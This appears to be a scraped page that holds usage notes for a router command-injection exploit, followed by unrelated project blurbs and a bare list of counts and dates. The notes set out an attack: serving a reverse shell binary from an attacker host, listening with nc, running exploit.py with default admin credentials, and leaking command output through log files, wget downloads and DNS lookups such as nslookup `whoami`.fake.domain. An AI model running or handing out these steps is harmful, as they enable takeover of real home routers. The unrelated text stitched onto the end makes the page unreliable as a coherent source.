# Install the requirements.
pip install -r requirements.txt
ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin
ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141
# Start HTTP server in order to serve the reverse shell executable.cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT
Leads for leaking command output
Look for file paths that are displayed within the web interface that command output can be written to. Using /tmp/ping.log to view the output at /Ping.asp.
Use wget to download reverse shell binary to the router.
Config the attacker as the DNS server and force the router to issue DNS requests with the command output. Like nslookup `whoami`.fake.domain
TODOs
Use argparse and make the exploit an executable.
Unsolved Mysteries
If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?
Simplest way to find Appointments in Bürgeramt Berlin, Not over engineered. Der einfachste Weg, Termine im Bürgeramt Berlin zu finden, ohne viel Schnickschnack.
A project to work with databases in 4 worksheets, insert, update, select, delete using Python and MySqI As a small project for school or college hope it is useful
127 Nov 23, 2022
5 Jan 12, 2022
1 May 24, 2022
1 Dec 02, 2021
47 Nov 09, 2022
32 Dec 24, 2022
9 Dec 27, 2022
16 Sep 09, 2022
14 Dec 29, 2022
8 Nov 25, 2022
2 Apr 28, 2022
1 Jan 11, 2022
1 Nov 29, 2021
0 Mar 16, 2022
8 Oct 14, 2022
36 Dec 01, 2022
0 Oct 27, 2022
5 Feb 06, 2022
5 Feb 26, 2022
3 Nov 12, 2022